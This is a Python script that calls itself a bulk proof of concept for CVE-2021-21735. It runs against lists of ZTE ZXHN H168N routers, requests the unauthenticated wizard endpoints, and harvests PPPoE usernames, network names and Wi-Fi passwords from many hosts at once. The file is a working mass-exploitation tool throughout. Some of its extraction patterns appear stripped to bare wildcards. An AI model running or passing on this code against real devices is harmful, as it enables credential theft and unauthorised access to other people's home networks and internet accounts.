import argparse import asyncio import html import re from pathlib import Path import aiohttp from colorama import Fore, Style, init DEFAULT_INPUT_PATH = Path("urls.txt") PASSWORD_FORM = { "IF_ACTION": "GetPassword", "_InstID_PASS": "DEV.WIFI.AP1.PSK1", "PASSTYPE": "PSK", } TABLE_TEMPLATE = "{:<3} | {:<34} | {:<30} | {:<30} | {:<30} | {:<25}" HEADERS = ["#", "URL", "AD Username", "VD Username", "ESSID", "Wi-Fi Password"] AD_USERNAME_PATTERN = r"(.*?)" VD_USERNAME_PATTERN = r"(.*?)" ESSID_PATTERN = r"\s*ESSID\s*\s*\s*(.*?)\s*" PASSWORD_PATTERN = r"KeyPassphrase\s*(.*?)" init() def parse_args() -> argparse.Namespace: parser = argparse.ArgumentParser( description="Bulk PoC for CVE-2021-21735 against ZTE ZXHN H168N wizard endpoints." ) parser.add_argument( "-i", "--input", type=Path, default=DEFAULT_INPUT_PATH, help="Path to a newline-delimited host list.", ) parser.add_argument( "--timeout", type=int, default=10, help="Per-host request timeout in seconds.", ) return parser.parse_args() def extract(pattern: str, text: str, default: str = "") -> str: match = re.search(pattern, text, re.DOTALL) if not match: return default return html.unescape(match.group(1).strip()) def load_hosts(input_path: Path) -> list[str]: return [line.strip() for line in input_path.read_text(encoding="utf-8").splitlines() if line.strip()] async def fetch_text(session: aiohttp.ClientSession, method: str, url: str, **kwargs) -> str: async with session.request(method, url, **kwargs) as response: response.raise_for_status() return await response.text() async def extract_router_secrets(session: aiohttp.ClientSession, host: str) -> dict[str, str]: base_url = f"http://{host}/wizard_page" try: pppoe_xml = await fetch_text(session, "GET", f"{base_url}/wizard_pppoe_lua.lua") wlan_xml = await fetch_text(session, "GET", f"{base_url}/wizard_wlan_config_lua.lua") password_xml = await fetch_text( session, "POST", f"{base_url}/wizard_wlan_config_lua.lua", data=PASSWORD_FORM, ) except Exception: return { "URL": host, "AD Username": "", "VD Username": "", "ESSID": "", "Wi-Fi Password": "", } return { "URL": host, "AD Username": extract(AD_USERNAME_PATTERN, pppoe_xml), "VD Username": extract(VD_USERNAME_PATTERN, pppoe_xml), "ESSID": extract(ESSID_PATTERN, wlan_xml), "Wi-Fi Password": extract(PASSWORD_PATTERN, password_xml)[:64], } def print_header() -> None: header = TABLE_TEMPLATE.format( "#", Fore.RED + HEADERS[1], Fore.GREEN + HEADERS[2], Fore.YELLOW + HEADERS[3], Fore.BLUE + HEADERS[4], Fore.MAGENTA + HEADERS[5] + Style.RESET_ALL, ) separator = Fore.CYAN + "-" * len(header) + Style.RESET_ALL print(separator) print(header + "|") print(separator) def print_row(index: int, row: dict[str, str]) -> None: rendered = TABLE_TEMPLATE.format( str(index), Fore.RED + row["URL"], Fore.GREEN + row["AD Username"], Fore.YELLOW + row["VD Username"], Fore.BLUE + row["ESSID"], Fore.MAGENTA + row["Wi-Fi Password"] + Style.RESET_ALL, ) separator = Fore.CYAN + "-" * len(rendered) + Style.RESET_ALL print(rendered + "|") print(separator) async def run_bulk_poc(input_path: Path, timeout_seconds: int) -> None: hosts = load_hosts(input_path) seen: set[tuple[str, str, str, str, str]] = set() results: list[dict[str, str]] = [] print_header() timeout = aiohttp.ClientTimeout(total=timeout_seconds) async with aiohttp.ClientSession(timeout=timeout) as session: tasks = [asyncio.create_task(extract_router_secrets(session, host)) for host in hosts] for task in asyncio.as_completed(tasks): try: row = await task except Exception as error: print(f"{Fore.RED}Error: {error}{Style.RESET_ALL}") continue identity = ( row["URL"], row["AD Username"], row["VD Username"], row["ESSID"], row["Wi-Fi Password"], ) if identity in seen: continue seen.add(identity) results.append(row) print_row(len(results), row) def main() -> None: args = parse_args() asyncio.run(run_bulk_poc(args.input, args.timeout)) if __name__ == "__main__": main()